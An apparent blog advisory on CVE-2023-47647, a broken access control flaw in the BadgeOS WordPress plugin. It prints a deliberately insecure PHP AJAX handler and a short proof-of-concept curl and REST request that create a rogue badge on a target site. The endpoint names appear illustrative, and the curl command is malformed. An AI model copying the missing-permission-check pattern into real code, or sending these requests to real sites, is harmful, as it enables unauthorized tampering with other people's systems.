CVE-2023-47647 - Exploiting Broken Access Control in BadgeOS (<= 3.7.1.6)

CVE-2023-47647 is a high-severity security flaw found in BadgeOS, a popular WordPress plugin used to create achievement systems on websites. This issue, running from uncertain earlier versions through 3.7.1.6, could let almost anyone perform restricted operations—without proper verification—if the plugin’s access controls are incorrectly set up.

In this post, I’ll break down how the vulnerability works, why it’s dangerous, and how attackers can use it. There’s also a step-by-step sample exploit and links to original references.

What Is CVE-2023-47647?

This vulnerability exists due to missing authorization or “broken access control” in the BadgeOS plugin. In simple words, the plugin failed to properly check if a user is allowed to perform certain tasks—like creating or editing achievement badges—even if they shouldn’t have the right to do so.

Impact:
With this bug, attackers can use specially crafted HTTP requests to perform administrative actions. If your site has users with low-level permissions (like contributors, students, or guests), they might trick the system and grant themselves badges, create new ones, or worse.

All BadgeOS versions up to and including 3.7.1.6

- Vulnerability might exist in earlier, unlisted versions (the “from n/a” part).

Technical Details

The main risk comes from endpoints (AJAX actions or REST API routes) that don’t check if the current user has the required permissions.

For example, an endpoint like /wp-admin/admin-ajax.php?action=badgeos_save_badge is supposed to be used by site admins only. But in faulty implementations, any logged-in user—or even a guest, depending on setup—can call this endpoint and perform privileged actions.

The code should have had current_user_can() or similar strict checks, but often didn’t.

Here’s a simplified, non-malicious example of bad code

// Example: Incsecure handler for saving a badge
add_action('wp_ajax_badgeos_save_badge', 'badgeos_save_badge_callback');

function badgeos_save_badge_callback() {
    // MISSING: if( !current_user_can('manage_options') ) { ... }
    
    $badge_title = $_POST['badge_title'];
    $badge_content = $_POST['badge_content'];
    
    // Save badge as new post type
    $badge_id = wp_insert_post([
        'post_title'   => $badge_title,
        'post_content' => $badge_content,
        'post_type'    => 'badgeos_badge',
        'post_status'  => 'publish'
    ]);
    
    echo json_encode(['status'=>'ok', 'badge_id'=>$badge_id]);
    wp_die();
}

What’s missing?
There’s no permission check (current_user_can(...)). So anyone who can make an AJAX call can create badges.

Craft a request

They then send an HTTP POST/GET request to the insecure endpoint.

Perform unauthorized actions

For example, create a new badge, edit existing ones, or trigger achievement logic, impacting the integrity of the system.

Sample Exploit (Proof of Concept)

You need an account on the website, but even low-privilege accounts usually work. Here’s a way to add a new badge via Curl:

curl -k -X POST 'https://target-site.com/wp-admin/admin-ajax.php'; \
  -d 'action=badgeos_save_badge' \
  -d 'badge_title=Hacked+Badge' \
  -d 'badge_content=You+have+been+hacked'

If the endpoint is unauthenticated, just this POST request adds a badge!

If the plugin allows it via REST, something like this can work (using an API tool like Postman)

POST /wp-json/badgeos/v1/badges
Authorization: Bearer <low-privilege-user-token>
Body: { "title": "Hacked Badge", "content": "Awarded by attacker" }

Real-World Example

A student on a learning site could send a malicious request and award themselves an "Expert" badge—skipping all intended checks and gamifying the integrity of the system.

On some sites, badge creation or modification can also have SEO or reputational impacts.

Fix and Recommendations

- Update Plugin: Upgrade BadgeOS beyond 3.7.1.6. Latest version changelog.
- Patch Checks: Ensure every sensitive handler checks current_user_can('manage_options') or stricter roles.

References

- Original CVE Entry: CVE-2023-47647
- BadgeOS Plugin Page
- Patchstack Advisory
- Detailed Report (patchstack.com)

Final Words

CVE-2023-47647 is a classic example of the damage possible when developers forget to double-check user permissions. Even trusted plugins with big user bases can have simple, critical bugs.

If you run BadgeOS, patch your plugins and check your users’ activities. Security is everyone’s job—even if you’re only earning badges.


*Need to check your plugins for vulnerabilities? Try tools like WPScan or Patchstack to keep your WordPress site safe!*

Timeline

Published on: 01/02/2025 12:15:16 UTC